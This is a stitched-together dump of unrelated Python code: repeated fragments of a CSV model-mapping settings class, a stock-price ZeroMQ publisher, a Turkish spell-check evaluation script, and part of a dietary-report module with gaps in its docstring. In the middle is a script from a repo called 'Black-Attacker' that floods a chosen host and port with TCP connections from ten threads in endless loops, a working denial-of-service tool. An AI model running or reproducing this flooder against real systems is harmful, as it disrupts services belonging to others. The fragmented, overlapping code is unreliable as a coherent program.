"= COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v",
"if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] =",
"{} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item):",
"['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings)",
"if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \"",
"raise ValueError(f'The following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path):",
"from collections import defaultdict from collections import namedtuple, Counter from modelmapper.misc import read_csv_gen,",
"VAR, defaulting to passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint)",
"self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set() def",
"self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item): conv",
"def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items(): if clean_name",
"in enumerate(line): try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your data might have",
"def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item",
"= {i: v for i, v in counter.most_common(10) if v > 1} if",
"raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\")",
"return result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint:",
"clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names,",
"= set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i]",
"source, to_replace in conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item):",
"need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int =",
"ValueError(f'The following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader",
"self.settings[v]) # Since we cleaning up the field_name_part_conversion, special characters # such as",
"item = camel_to_snake(item) for source, to_replace in conv: item = item.replace(source, to_replace) return",
"= self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'),",
"enumerate(line): try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your data might have new",
"and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def",
"return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names)",
"except IndexError: pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i,",
"= to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name",
"duplicates: raise ValueError(f'The following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self,",
"combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name,",
"result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and \\",
"isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item]",
"camel_to_snake(item) for source, to_replace in conv: item = item.replace(source, to_replace) return item.strip('_') def",
"we cleaning up the field_name_part_conversion, special characters # such as \\n need to",
"read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names =",
"= slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] =",
"self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping):",
"self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint",
"to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to",
"lists \"\"\" if item not in self.settings: self.settings[item] = [] try: first_value =",
"it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line))",
"has any characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x:",
"names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names,",
"list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion:",
"produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether line has",
"or nested lists \"\"\" if item not in self.settings: self.settings[item] = [] try:",
"if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username",
"self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if",
"\\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int",
"item): \"\"\" Normalizes list or nested lists \"\"\" if item not in self.settings:",
"with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self,",
"slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] =",
"csv and turning into dictionary for line in reader: if self._does_line_include_data(line): for i,",
"name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping =",
"int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings",
"= None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None)",
"= setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs",
"\"\"\" Normalizes list or nested lists \"\"\" if item not in self.settings: self.settings[item]",
"self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text, username=self.settings.slack_username, channel=self.settings.slack_channel, slack_http_endpoint=self.settings.slack_http_endpoint",
"_get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and",
"to be passed to init or SETUP_PATH needs to be a class attribute.')",
"v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get",
"for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed",
"_max_int = ((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda",
"in reader: if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i]",
"None) if self.setup_path is None: raise ValueError('setup_path needs to be passed to init",
"= ((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x:",
"list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader =",
"= read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names",
"in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of,",
"for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has",
"OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH =",
"1} if duplicates: raise ValueError(f'The following fields were repeated in the csv: {duplicates}')",
"needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs",
"OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for",
"= self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result",
"as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_'])",
"= ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings =",
"'') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters']",
"self.settings: self.settings[item] = [] try: first_value = self.settings[item][0] except IndexError: pass else: if",
"defaultdict from collections import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from",
"raise ValueError(\"Your data might have new lines in the field names. \" \"Please",
"line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v for i,",
"and turning into dictionary for line in reader: if self._does_line_include_data(line): for i, v",
"SETUP_PATH needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path",
"_get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for",
"both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether line",
"= set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] =",
"to get passed in value from ENV VAR, defaulting to passed in value",
"return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items():",
"= clean_names[i] except IndexError: raise ValueError(\"Your data might have new lines in the",
"if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else:",
"that and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result",
"= item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv: item",
"dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields",
"any characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip())",
"the field names. \" \"Please fix that and try again.\") else: if field_name",
"for source, to_replace in self.settings.field_name_full_conversion: if item == source: item = to_replace break",
"# such as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0,",
"any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates",
"needs to end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later",
"= self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for line in reader:",
"reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for line in",
"modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger =",
"self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set =",
"key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields =",
"be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v))",
"['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i, v in self.settings['max_int'].items())",
"self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i] except IndexError: raise",
"raise ValueError('The path needs to end with _setup.toml') self.debug = debug self.setup_dir =",
"item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or nested lists",
"self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path',",
"self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for item",
"that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def",
"= os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] |",
"set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] =",
"needs to be passed to init or SETUP_PATH needs to be a class",
"except IndexError: raise ValueError(\"Your data might have new lines in the field names.",
"collections import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import",
"added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for",
"again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text):",
"= identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] =",
"seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i,",
"to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in",
"i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings',",
"namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME",
"lines in the field names. \" \"Please fix that and try again.\") else:",
"logging import importlib from ast import literal_eval from copy import deepcopy from collections",
"be passed to init or SETUP_PATH needs to be a class attribute.') if",
"convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings",
"for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir,",
"# transposing csv and turning into dictionary for line in reader: if self._does_line_include_data(line):",
"self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path",
"name_mapping = {} for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def",
"reader: if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i] except",
"if self.setup_path is None: raise ValueError('setup_path needs to be passed to init or"
"Please read the code. Do not use ctrl + c and ctrl +",
"host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)",
"colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host =",
"while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in",
"True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10):",
"Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__",
"the code. Do not use ctrl + c and ctrl + v (~ ̄▽ ̄)~",
"except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1]",
"print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if",
"= threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except (KeyboardInterrupt,EOFError): print(\"Stop...\") sys.exit()",
"= int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To",
"for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try:",
"'\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port =",
"{Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__':",
"and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init()",
"sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s =",
"range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except (KeyboardInterrupt,EOFError):",
"int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\")",
"try: from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end =",
"end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1]",
"install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host",
"sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True:",
"t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except (KeyboardInterrupt,EOFError): print(\"Stop...\")",
"#!/usr/bin/python3 # Please read the code. Do not use ctrl + c and",
"c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init",
"dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i",
"import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\")",
"use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from",
"def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for",
"ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] ==",
"s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t",
"port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send",
"= sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port))",
"<reponame>black-software-Com/Black-Attacker<gh_stars>1-10 #!/usr/bin/python3 # Please read the code. Do not use ctrl + c",
"socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i])",
"init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if",
"not use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try:",
"(~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip install",
"from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m'",
"= '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port",
"main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def",
"os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]:",
"s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start()",
"ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except",
"v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip",
"# Please read the code. Do not use ctrl + c and ctrl",
"read the code. Do not use ctrl + c and ctrl + v",
"import Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main():",
"= socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t =",
"Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print()",
"Do not use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading",
"i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main()",
"print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d):",
"colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def",
"+ c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import",
"ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama",
"== sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s",
"def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2])",
"+ v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError:",
"code. Do not use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import",
"sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet",
"To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ ==",
"in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except",
"if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while",
"os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end"
] |
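The only non-obvious call in this script is `connect_ex`, which reports failure through a return code instead of raising, so the loop above keeps printing even when the target refuses every connection. A minimal standalone sketch (the localhost address and port are arbitrary assumptions):

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
rc = s.connect_ex(("127.0.0.1", 9))  # port 9 is assumed closed on most machines
print("connect_ex returned", rc)     # 0 on success, an errno value on failure
s.close()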
<filename>devices/server.py
import zmq
import random
import time


class Server():
    """
    The server is the publisher: it has a stock associated with it and
    constantly generates a new variation of the stock price, publishing it
    to the forwarder and, consequently, to the subs.
    """

    def __init__(self, front_port: int, stock: str, stock_value: float):
        self._stock = stock
        self._value = stock_value
        port = str(front_port)
        self._context = zmq.Context()
        self._socket = self._context.socket(zmq.PUB)  # Defines its socket as a PUB-type socket
        # Connect the socket to the frontend port of the forwarder (the source
        # comment says "Bind", but the code connects; the forwarder binds)
        self._socket.connect("tcp://localhost:%s" % port)

    def run(self):
        try:
            while True:
                negative = -1 if random.random() >= 0.5 else 1  # Decides whether the variation will be positive or negative
                variation = random.random() * 0.01 * negative   # Decides the variation value
                self._value += self._value * variation          # Sets up the new value
                # Mount up the message about the stock
                messagedata = "Stock:%s" % self._stock + "_Value:%f" % self._value \
                    + "_Variation:%f" % (variation * 100) + "%"
                self._socket.send_string("%s %s" % (self._stock, messagedata))  # Sends the message through the socket
                time.sleep(1)
        except KeyboardInterrupt:  # the source used a bare `except:`, which also swallows real errors
            print('Shutting down server')
        finally:
            self._socket.close()
            self._context.term()


def start_new_server(front_port: int, stock: str, stock_value: float):
    s = Server(front_port, stock, stock_value)
    s.run()
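A subscriber counterpart is not part of this file, but the PUB socket above implies one on the other side of the forwarder. A minimal sketch, assuming the forwarder exposes a backend port (`back_port` is a hypothetical name) and relying on ZeroMQ's prefix matching, since each message starts with the stock name:

import zmq

def subscribe(back_port: int, stock: str):
    context = zmq.Context()
    socket = context.socket(zmq.SUB)
    socket.connect("tcp://localhost:%s" % back_port)  # forwarder's backend port (assumed)
    socket.setsockopt_string(zmq.SUBSCRIBE, stock)    # topic filter: message prefix
    while True:
        print(socket.recv_string())

The publisher connects rather than binds because, in a forwarder topology, the forwarder device is the stable endpoint that binds both its frontend and backend; publishers and subscribers both connect to it.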
<reponame>mukayese-nlp/mukayese-baselines
from zemberek import (
    TurkishSpellChecker,
    TurkishMorphology,
)
import sys
import json
import pandas as pd
from tqdm import tqdm

morphology = TurkishMorphology.create_with_defaults()
sc = TurkishSpellChecker(morphology)

if __name__ == '__main__':
    df = pd.read_csv(sys.argv[1])
    spellings = {}
    for w, g in tqdm(zip(df['input'], df['gold'])):
        sugg = sc.suggest_for_word(w)
        spellings[w] = {
            'input': w,
            'gold': str(g),
            'spelling': int(w not in sugg),
            'suggestions': sugg
        }
    with open(sys.argv[2], 'w') as f:
        for w in spellings:
            f.write(json.dumps(spellings[w], ensure_ascii=False) + '\n')
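The script writes one JSON object per line (JSON Lines), where `spelling` is 1 exactly when the input word is absent from the checker's suggestions. A minimal sketch of consuming that output; the file name stands in for whatever was passed as `sys.argv[2]`:

import json

with open("spellings.jsonl") as f:  # hypothetical name for the sys.argv[2] output
    records = [json.loads(line) for line in f]

flagged = sum(r["spelling"] for r in records)  # words not found among their own suggestions
print(f"{flagged} of {len(records)} words flagged")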
"""
This file contains the logic to generate the master dataset for the INDDEX reports

Overview
--------
Beneficiaries are asked about their diet in a "recall" session. This results in a
"foodrecall" case. Every [...] mention results in the creation of a "food" case
that's a child of this foodrecall. This dataset has a row for every food, with
metadata about the recall session, [...] what data is or isn't available. Some of
these foods are recipes, and their ingredients appear as separate rows in the
report.

Standard recipes have [...] additional rows inserted for each ingredient. These
rows are associated with the recipe case, but don't have a case of their own.
Nonstandard recipes are defined by the user and beneficiary during a recall
session. The ingredients of the recipe are entered as additional food cases and
linked to the recipe by `recipe_case_id`. Beneficiaries may report eating a
nonstandard recipe more than once, in which case subsequent references point to
the recipe definition with already_reported_recipe_case_id and don't enumerate
the ingredients again. We need to insert duplicates of the previously reported
ingredients into the report for them.

Components
----------
FoodData :: This is the interface to this dataset, it glues together all the
            component pieces and presents the result as a unified dataset.
FoodRow :: Class responsible for [...] and indicator definitions.
"""
import operator
import uuid
from collections import defaultdict
from functools import reduce

from memoized import memoized

from corehq.apps.es import users as user_es
from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF
from corehq.apps.reports.standard.cases.utils import get_case_owners
from custom.inddex.ucr_data import FoodCaseData

from .const import (  # AGE_RANGES inferred from its use in FoodRow.age_range below
    AGE_RANGES,
    FOOD_ITEM,
    NON_STANDARD_RECIPE,
    STANDARD_RECIPE,
    ConvFactorGaps,
    FctGaps,
)
from .fixtures import FixtureAccessor

IN_UCR = 'in_ucr'
IN_FOOD_FIXTURE = 'in_food_fixture'
IS_RECALL_META = 'is_recall_meta'
CALCULATED_LATER = 'calculated_later'


class I:
    def __init__(self, slug, *tags):
        self.slug = slug
        tags = set(tags)
        self.in_ucr = IN_UCR in tags
        self.in_food_fixture = IN_FOOD_FIXTURE in tags
        self.is_recall_meta = IS_RECALL_META in tags
        self.is_calculated_later = CALCULATED_LATER in tags


# Indicator descriptions can be found here:
# https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit
INDICATORS = [
    # [...]
    I('recall_case_id', IN_UCR, IS_RECALL_META),
